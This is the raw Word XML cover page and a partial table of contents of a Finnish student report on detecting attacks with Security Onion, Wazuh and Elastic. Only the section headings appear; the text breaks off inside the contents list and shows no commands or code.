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401FE" w:rsidR="00616A56" w:rsidP="00606E2F" w:rsidRDefault="009F7561" w14:paraId="4D1F685B" w14:textId="0254A07B">
      <w:pPr>
        <w:pStyle w:val="Otsikko"/>
      </w:pPr>
      <w:r w:rsidRPr="009F7561">
        <w:t>Tapaustutkimus: Uhkien tunnistaminen ja reagointi Security Onionilla, Wazuhilla ja Elasticilla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F401FE" w:rsidR="00616A56" w:rsidP="008E1D38" w:rsidRDefault="005713A7" w14:paraId="48F35994" w14:textId="065C88F6">
      <w:pPr>
        <w:pStyle w:val="Kansilehtialanimi"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ryhmä </w:t>
      </w:r>
      <w:r w:rsidR="005B3CA5">
        <w:t>13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00942636" w:rsidR="00616A56" w:rsidP="005B3CA5" w:rsidRDefault="005B3CA5" w14:paraId="3AC05989" w14:textId="14A622C5">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
      </w:pPr>
      <w:r w:rsidRPr="00942636">
        <w:t>Leevi Kauranen, AC7750</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00942636" w:rsidR="00EC6E41" w:rsidP="005B3CA5" w:rsidRDefault="005B3CA5" w14:paraId="00379D49" w14:textId="18F24198">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
      </w:pPr>
      <w:r w:rsidRPr="00942636">
        <w:t>Samir Benjenna, AD1437</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3CA5" w:rsidP="005B3CA5" w:rsidRDefault="005B3CA5" w14:paraId="765E9007" w14:textId="531FC081">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
      </w:pPr>
      <w:r>
        <w:t>Eelis Suhonen, AA3910</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3CA5" w:rsidP="005B3CA5" w:rsidRDefault="005B3CA5" w14:paraId="30D8E6E2" w14:textId="669E79B6">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
      </w:pPr>
      <w:r>
        <w:t>Juho Eräjärvi, AD1276</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3CA5" w:rsidP="005B3CA5" w:rsidRDefault="005B3CA5" w14:paraId="465A4A17" w14:textId="190DD375">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
      </w:pPr>
      <w:r>
        <w:t>Mikke Kuula, AC7806</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B3CA5" w:rsidP="005B3CA5" w:rsidRDefault="005B3CA5" w14:paraId="7CF1D7BB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B3CA5" w:rsidP="00925482" w:rsidRDefault="005B3CA5" w14:paraId="1E9F6BB5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B3CA5" w:rsidP="00925482" w:rsidRDefault="005B3CA5" w14:paraId="4421BC31" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="005B3CA5" w:rsidR="005B3CA5" w:rsidP="005B3CA5" w:rsidRDefault="005B3CA5" w14:paraId="7E66B776" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00DD209B" w:rsidR="00180EDE" w:rsidP="008E1D38" w:rsidRDefault="008E1371" w14:paraId="7099BC0E" w14:textId="01F5C464">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
      </w:pPr>
      <w:r w:rsidR="008E1371">
        <w:rPr/>
        <w:t>Poikkeamien hallinta ja kyberturvakeskukset TTC6060-3007</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="731CBB43" w:rsidP="261F289F" w:rsidRDefault="731CBB43" w14:paraId="3994BEC9" w14:textId="57647B8F">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="60" w:beforeAutospacing="off" w:after="60" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1276" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="731CBB43">
        <w:rPr/>
        <w:t>5.12.2024</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E78E3" w:rsidP="001E78E3" w:rsidRDefault="005B3CA5" w14:paraId="55BFD692" w14:textId="18E8F313">
      <w:pPr>
        <w:pStyle w:val="KansilehtiOpintotiedot"/>
      </w:pPr>
      <w:r>
        <w:t>Tieto- ja viestintätekniikka</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E78E3" w:rsidRDefault="001E78E3" w14:paraId="412411F3" w14:textId="77777777">
      <w:pPr>
        <w:sectPr w:rsidR="001E78E3" w:rsidSect="0058148B">
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="11907" w:h="16839" w:orient="portrait" w:code="9"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="1128" w:footer="1162" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E84789" w:rsidR="00115876" w:rsidP="00FF4C28" w:rsidRDefault="005B1701" w14:paraId="1FD16069" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Sisllysluettelootsikko"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E84789">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sisä</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84789" w:rsidR="004666C1">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>ltö</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00F131CE" w14:paraId="17101DCC" w14:textId="680C43B2">
      <w:pPr>
        <w:pStyle w:val="Sisluet1"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="480"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9210"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ 明朝" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">TOC \o "1-3" \z \u \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc152041011">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Teoria</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc152041011 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="6053E0A4" w14:textId="654062B8">
      <w:pPr>
        <w:pStyle w:val="Sisluet2"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9210"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ 明朝" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc283925451">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>2.1</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Miten SOAR ja SIEM eroavat toisistaan</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc283925451 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="0CDDE300" w14:textId="55419A7B">
      <w:pPr>
        <w:pStyle w:val="Sisluet2"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="72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082550733">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>2.2</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Security Onion, Elastic ja Wazuh</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1082550733 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="375A2E4C" w14:textId="5F48B04B">
      <w:pPr>
        <w:pStyle w:val="Sisluet1"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="48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988154086">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Testaukset ja havainnot</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1988154086 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="19AEF566" w14:textId="01B47538">
      <w:pPr>
        <w:pStyle w:val="Sisluet2"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9210"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ 明朝" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc411660580">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.1</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Security Onion</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc411660580 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="68091116" w14:textId="0BD5619C">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260754327">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.1.1</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Verkkojen skannaus</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc260754327 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="3EE15A53" w14:textId="6161FBEF">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508244027">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.1.2</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Brute force</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1508244027 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="6652FA1E" w14:textId="2ED1B81F">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857378946">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.1.3</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Sovellustason protokollat: web protokollat</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1857378946 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="1852342E" w14:textId="44C4DC1E">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737066921">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.1.4</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>DNS tunnelointi</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1737066921 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="24A8960A" w14:textId="516E6A28">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660083900">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.1.5</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>TCP reverse shell</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc660083900 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="7290C27D" w14:textId="230A20F9">
      <w:pPr>
        <w:pStyle w:val="Sisluet2"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="72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38363321">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.2</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Wazuh</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc38363321 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="368232D7" w14:textId="1DA2C5C6">
      <w:pPr>
        <w:pStyle w:val="Sisluet3"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1200"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9210"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ 明朝" w:cs="Arial" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:lang w:val="fi-FI" w:eastAsia="fi-FI"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc1132707596">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.2.1</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>FTP protokollan käyttö tiedon siirtämisessä ulos</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1132707596 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="3BE53EA4" w14:textId="42B3A42A">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2005223858">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.2.2</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Tunnistetietojen dumppaus</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc2005223858 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="64A0FFEE" w14:textId="26175D82">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339283002">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.2.3</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Skriptien ajo käynnistyksessä</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1339283002 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="0F872BF3" w14:textId="490D23EF">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2031889781">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.2.4</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Uuden käyttäjän luonti</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc2031889781 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="4FADBEA0" w14:textId="6BD0AAF5">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773402701">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>3.2.5</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>Windows-Järjestelmäprosessin käynnistäminen tai muokkaaminen</w:t>
        </w:r>
        <w:r>
          <w:tab/>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve">PAGEREF _Toc1773402701 \h</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32441" w:rsidP="261F289F" w:rsidRDefault="00B32441" w14:paraId="5776E68D" w14:textId="58675459">
      <w:pPr>
        <w:pStyle w:val="Sisluet2"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="72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430395791">
        <w:r w:rsidRPr="261F289F" w:rsidR="261F289F">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
          </w:rPr>
